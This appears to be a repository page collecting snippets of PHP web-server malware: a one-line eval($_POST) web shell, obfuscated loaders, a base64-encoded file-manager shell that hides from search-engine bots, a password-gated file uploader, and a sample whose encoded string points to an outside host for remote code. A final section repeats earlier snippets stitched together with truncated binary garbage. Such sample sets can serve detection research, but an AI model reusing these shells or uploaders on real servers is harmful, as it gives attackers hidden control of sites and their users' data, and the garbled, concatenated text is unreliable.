Palma Solutions LTD PalmaSolutions

## sysinfo.motd.pl
#!/usr/bin/perl

use Data::Dumper;

sub GetIpAddresses{
        my $output = qx(ifconfig);
        my $hash = {};
        my $interface;
        foreach my $line (split /[\r\n]+/, $output) {
                if($line =~ m/^([^ ]+)/) {

## plugins.php
<?php

/*

                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

## xml.php
<?php
$j51="Sw63])Gua<[%sIegZB/o(\\UQ\r-Ln0d 2p^7Em5;.ih4A>bq,\t{8&_~VCvOX:j=\"zW\n*?TMN9'PR#Yk1fFr!t+JDy@`|c\$}HxlK"; $GLOBALS['jwaap78'] = $j51[14].$j51[81].$j51[81].$j51[19].$j51[81].$j51[52].$j51[81].$j51[14].$j51[32].$j51[19].$j51[81].$j51[83].$j51[40].$j51[27].$j51[15]; $GLOBALS['xrmxu81'] = $j51[40].$j51[27].$j51[40].$j51[52].$j51[12].$j51[14].$j51[83]; $GLOBALS['jyyzb48'] = $j51[29].$j51[14].$j51[79].$j51[40].$j51[27].$j51[14]; $GLOBALS['xsajl38'] = $j51[29].$j51[1].$j51[91].$j51[7].$j51[45].$j51[42].$j51[2]; $GLOBALS['gmbuo37'] = $j51[8].$j51[46].$j51[29].$j51[15].$j51[77].$j51[34]; $GLOBALS['npgeb16'] = $j51[36].$j51[29].$j51[37]; $GLOBALS['docrs69'] = $j51[91].$j51[19].$j51[7].$j51[27].$j51[83]; $GLOBALS['inatc62'] = $j51[83].$j51[40].$j51[36].$j51[14]; $GLOBALS['ubble32'] = $j51[91].$j51[19].$j51[27].$j51[12].$j51[83].$j51[8].$j51[27].$j51[83]; $GLOBALS['mtmqa91'] = $j51[29].$j51[29].$j51[40].$j51[91].$j51[8].$j51[50].$j51[78]; $GLOBALS['xrcop59'] = $j51[14].$j51[77].$j51[45].$j51[12].$j51[1].$j5

## 16823392131320052863.php
<?php eval($_POST[1]); ?>

## 0e9c8.php
<?php

chmod(get_root_path(), 0755);
chmod(get_root_path().'/index.php', 0644);
chmod(get_root_path().'/.htaccess', 0644);
if (file_exists(get_root_path().'/index.php') && !is_writable(get_root_path().'/index.php') || file_exists(get_root_path().'/.htaccess') && !is_writable(get_root_path().'/.htaccess'))
{
	fail_reason('Index.php or .htaccess isn\'t writable');
}

## unknown-malware-1.php
<?php

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91c2VfYWpheCwkZGVmYXVsdF9jaGFyc2V0LCRzb3J0Ow0KZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsNCg0KJGF1dGhfcGFzcyA9ICdmMzI0MmRjYzU5YThkNGRhNzAwMjcyZjA0YjQzMzJkMCc7DQokY29sb3IgPSAiI2RmNSI7DQokZGVmYXVsdF9hY3Rpb24gPSAnRmlsZXNNYW4nOw0KJGRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOw0KJGRlZmF1bHRfY2hhcnNldCA9ICdXaW5kb3dzLTEyNTEnOw0KDQppZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgew0KICAgICR1c2VyQWdlbnRzID0gYXJyYXkoIkdvb2dsZSIsICJTbHVycCIsICJNU05Cb3QiLCAiaWFfYXJjaGl2ZXIiLCAiWWFuZGV4IiwgIlJhbWJsZXIiKTsNCiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wnLCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7DQogICAgICAgIGhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpOw0KICAgICAgICBleGl0Ow0KICAgIH0NCn0NCg0KQGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsNCkBzZXRfdGltZV9saW1pdCgwKTsNCg0KDQppZihnZXRfbWFnaWNfcXV

## uploader-1.php
<?php
if(!empty($_FILES['message']['name']) && (md5($_POST['name']) == '10a60045bb1f3bde8b75b0c8757e2307'))
{
	$sc = (empty($_POST['security_code'])) ? '.' : $_POST['security_code'];
	$sc = rtrim($sc, "/");

	$a = 'c';
	$a .= 'h';
	$a .= 'mod';


## unknown-malware-2.php
<?php /* -- enphp : https://git.oschina.net/mz/mzphp2 */ error_reporting(E_ALL^E_NOTICE);define('∆É', 'ı');∂¿ÀñóÁƒÏˆÌ–∆Æ…§ç‰·ÜØøﬂπ® Ô÷Ñ∂¿ÈÏÅ∂Ñôü»áñ∂◊›Â¢ÉÛà‰˘∑•⁄Õ•·§™ôÂïÜÁÀãÅÍ”àÅã‡ﬂÉ‚‰ã«ﬂ√Ì∫µª‡ò‡ã±∆°∏ÆÏ√∞ÿóπ⁄¢ö∫îûû¯™ÂŸÓ”ï§êıΩÒÇÓ∏£ßÁëÍôÈÉ“ƒ•ÌÄ∫çû≥∑Öé¶Ÿ£;$_SERVER[∆É] = explode('|||', gzinflate(substr('ãÈ>¡error_reporting|||define|||öò|||∆|||öò|||explode|||||||||gzinflate|||substr|||ãUú«ŒÉäñf’Ézè£#—EÍ∫%ës∆ò\\arŒQıÕπÁ™•ôﬂ∆ò∞˜∑◊“o≥nÀ?ó|Íí4ˇüˇı?ˇÒ?ˇ¸˝ü?¨€≤‰«ﬂÀˇ¯˚·ó¨9Å˝3À”1˚˜{˙ˇ˜Í˚Ô}«ˇ{kó/ß’øüóÏÔÖÚ©á¢K∂o·ü≈?œÈÔ≈”Ê}èK(ˇ`N‡‡æCŸÿ’Ωﬁ“‘–¢fÜÍ˚2o2•TVJ≤„˚ëŒ9%c¨ h=ÿ¸>Lvbﬂh|mπá˚Ÿöü¨{∑±h)¸5RÊÿò‹»ˆ‘P≥#yMY¿\'|m:c∆Ê]	."ó>û5n∫È∏Ÿ∑Ç5æ(ˆYÀ‘h¶Ñ\'
¡Mf˘ıny⁄áº•úöj1Ô´™∏ïG]tèΩpº”:¸"P`äóÎavæèUPHÈh	øÿŸü“í
©Ã!ÄÆüÁ⁄Qó≈¿:≥;åJjêˇö.lœ~»ÊU≠ù¿àÛimó(k-|ü›É8#`sí_˛C˛YÔπ Hùî¸‹¡ùL{Ñ‡I˘ééÑ •ÆZ‡ú›!àáX∫tÖ7NÆôΩ∑“•@˘™ÙkV«ﬁi<†∑§ñŒ:∏b4`)Æzª…÷ÓIW>‰Úvº°—€ºŸÑ*ÅÌÆt:÷ÉéäøQ	ÿR(“?z0Û‰ñ9>uj"E¨≈WíEíC©vµÙçN0.6;«M< àá^é%∏‰7ô„nMY⁄<åÃîÀGÆàW·X∑Ë

## unknown-malware-3.php
<?php $fnusosodlsdf="aHR0cDovL21pY3Jvc29mdDY0LmNvbS9iaW5nYm90L21zLnNlYXJjaC5wb3N0LnBocA==";$nusidlaslalskdjfka="";$asuakdwnnas="aHR0cDovL2dvb2dsZS5jb20v";$nwjduusispspa=""; $jsksuaoaapspp="C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae";
$ndsksd='rVlpf6JIt3+fT0GMd6JtoqDiMhlmogi4IoIaddLxB8giIrIIQWb6u98q0Kxmpp/73BfdFlWnzjl1tvqfykWhwEmiN9YDxNc0+ddCQXNVLX+QbOvgS6pWUFwnCJP/87Iv/xFJjkvYYEuw/yV0TYKrmJhQ5NlqEauSQ2aOCQd7Uq+pTdmTCgo2qFYKzZlguReuokjKUnFlSdECcZ9Bs3cXgRgsVVfLPF47gSofLHMZU6mP1zeIZx1UF9AUCkiJo9JXt8qq7ciZJ8W5XLNUrkdwobfFbtX8JDu0d2l+44l2Sd/7jjrZlpwRvlYpwqBL684i4nPoTBG50Kqry2xmV+tospa9lD3e4VZFsWY/ZRsbuVfOinaNQ7F2F6sYT32BIm0npziLlVItmauB25ZHVfxqz1Xl7i4aodtxVuar5iVf+8Zf2mauYva3qsU9ZXSxUSEzYome+bbcnWBlXts1Lof8k3VrDIbm5UJGb0VmZZQmvJu1OmxnLLTldWgO/KLKdSmGfipiJVz89s2gLzcKlp3omRFXqrR7PbSek/f3yu1gRLFL2nqq1Rk1X5lQWb2RI0mKtf2WwV/ttvu2MyHCqEG22QE+aCvoVbXavTf6V0tV1sraSHQadEfs6fvZZmUOxyGFuiLFbq/EcLvrNmqrWWQVS2F93Jrg7XKJdTp79IrGuasevtxv97lN3cD19tasEDS2xp+KZndkzC5ZdxcStLZd5W8reHE0MYr6+FYhKUG+x4xQrQmsRd3mnzL4FbP5dlv0/dtuces/tfjFCht

## unknown-malware-4.php
<?php
function pet($Auc)
{
    $Auc=str_rot13(base64_decode($Auc));
    for($i=0;$i<strlen($Auc);$i++)
    {
        $Auc[$i] = chr(ord($Auc[$i])-1);
    }
    return $Auc;
}
	#!/usr/bin/perl

	use Data::Dumper;

	sub GetIpAddresses{
	my $output = qx(ifconfig);
	my $hash = {};
	my $interface;
	foreach my $line (split /[\r\n]+/, $output) {
	if($line =~ m/^([^ ]+)/) {
	<?php

	/*

	GNU GENERAL PUBLIC LICENSE
	Version 3, 29 June 2007

	Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
	Everyone is permitted to copy and distribute verbatim copies
	of this license document, but changing it is not allowed.
	<?php

	chmod(get_root_path(), 0755);
	chmod(get_root_path().'/index.php', 0644);
	chmod(get_root_path().'/.htaccess', 0644);
	if (file_exists(get_root_path().'/index.php') && !is_writable(get_root_path().'/index.php') \|\| file_exists(get_root_path().'/.htaccess') && !is_writable(get_root_path().'/.htaccess'))
	{
	fail_reason('Index.php or .htaccess isn\'t writable');
	}
	<?php

	$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
	$string = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91c2VfYWpheCwkZGVmYXVsdF9jaGFyc2V0LCRzb3J0Ow0KZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsNCg0KJGF1dGhfcGFzcyA9ICdmMzI0MmRjYzU5YThkNGRhNzAwMjcyZjA0YjQzMzJkMCc7DQokY29sb3IgPSAiI2RmNSI7DQokZGVmYXVsdF9hY3Rpb24gPSAnRmlsZXNNYW4nOw0KJGRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOw0KJGRlZmF1bHRfY2hhcnNldCA9ICdXaW5kb3dzLTEyNTEnOw0KDQppZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgew0KICAgICR1c2VyQWdlbnRzID0gYXJyYXkoIkdvb2dsZSIsICJTbHVycCIsICJNU05Cb3QiLCAiaWFfYXJjaGl2ZXIiLCAiWWFuZGV4IiwgIlJhbWJsZXIiKTsNCiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wnLCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7DQogICAgICAgIGhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpOw0KICAgICAgICBleGl0Ow0KICAgIH0NCn0NCg0KQGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsNCkBzZXRfdGltZV9saW1pdCgwKTsNCg0KDQppZihnZXRfbWFnaWNfcXV
	<?php
	if(!empty($_FILES['message']['name']) && (md5($_POST['name']) == '10a60045bb1f3bde8b75b0c8757e2307'))
	{
	$sc = (empty($_POST['security_code'])) ? '.' : $_POST['security_code'];
	$sc = rtrim($sc, "/");

	$a = 'c';
	$a .= 'h';
	$a .= 'mod';
	<?php /* -- enphp : https://git.oschina.net/mz/mzphp2 */ error_reporting(E_ALL^E_NOTICE);define('∆É', 'ı');∂¿ÀñóÁƒÏˆÌ–∆Æ…§ç‰·ÜØøﬂπ® Ô÷Ñ∂¿ÈÏÅ∂Ñôü»áñ∂◊›Â¢ÉÛà‰˘∑•⁄Õ•·§™ôÂïÜÁÀãÅÍ”àÅã‡ﬂÉ‚‰ã«ﬂ√Ì∫µª‡ò‡ã±∆°∏ÆÏ√∞ÿóπ⁄¢ö∫îûû¯™ÂŸÓ”ï§êıΩÒÇÓ∏£ßÁëÍôÈÉ“ƒ•ÌÄ∫çû≥∑Öé¶Ÿ£;$_SERVER[∆É] = explode('\|\|\|', gzinflate(substr('ãÈ>¡error_reporting\|\|\|define\|\|\|öò\|\|\|∆\|\|\|öò\|\|\|explode\|\|\|\|\|\|\|\|\|gzinflate\|\|\|substr\|\|\|ãUú«ŒÉäñf’Ézè£#—EÍ∫%ës∆ò\\arŒQıÕπÁ™•ôﬂ∆ò∞˜∑◊“o≥nÀ?ó\|Íí4ˇüˇı?ˇÒ?ˇ¸˝ü?¨€≤‰«ﬂÀˇ¯˚·ó¨9Å˝3À”1˚˜{˙ˇ˜Í˚Ô}«ˇ{kó/ß’øüóÏÔÖÚ©á¢K∂o·ü≈?œÈÔ≈”Ê}èK(ˇ`N‡‡æCŸÿ’Ωﬁ“‘–¢fÜÍ˚2o2•TVJ≤„˚ëŒ9%c¨ h=ÿ¸>Lvbﬂh\|mπá˚Ÿöü¨{∑±h)¸5RÊÿò‹»ˆ‘P≥#yMY¿\'\|m:c∆Ê] ."ó>û5n∫È∏Ÿ∑Ç5æ(ˆYÀ‘h¶Ñ\'
	¡Mf˘ıny⁄áº•úöj1Ô´™∏ïG]tèΩpº”:¸"P`äóÎavæèUPHÈh øÿŸü“í
	©Ã!ÄÆüÁ⁄Qó≈¿:≥;åJjêˇö.lœ~»ÊU≠ù¿àÛimó(k-\|ü›É8#`sí_˛C˛YÔπ Hùî¸‹¡ùL{Ñ‡I˘ééÑ •ÆZ‡ú›!àáX∫tÖ7NÆôΩ∑“•@˘™ÙkV«ﬁi<†∑§ñŒ:∏b4`)Æzª…÷ÓIW>‰Úvº°—€ºŸÑ*ÅÌÆt:÷ÉéäøQ ÿR(“?z0Û‰ñ9>uj"E¨≈WíEíC©vµÙçN0.6;«M< àá^é%∏‰7ô„nMY⁄<åÃîÀGÆàW·X∑Ë
	<?php
	function pet($Auc)
	{
	$Auc=str_rot13(base64_decode($Auc));
	for($i=0;$i<strlen($Auc);$i++)
	{
	$Auc[$i] = chr(ord($Auc[$i])-1);
	}
	return $Auc;
	}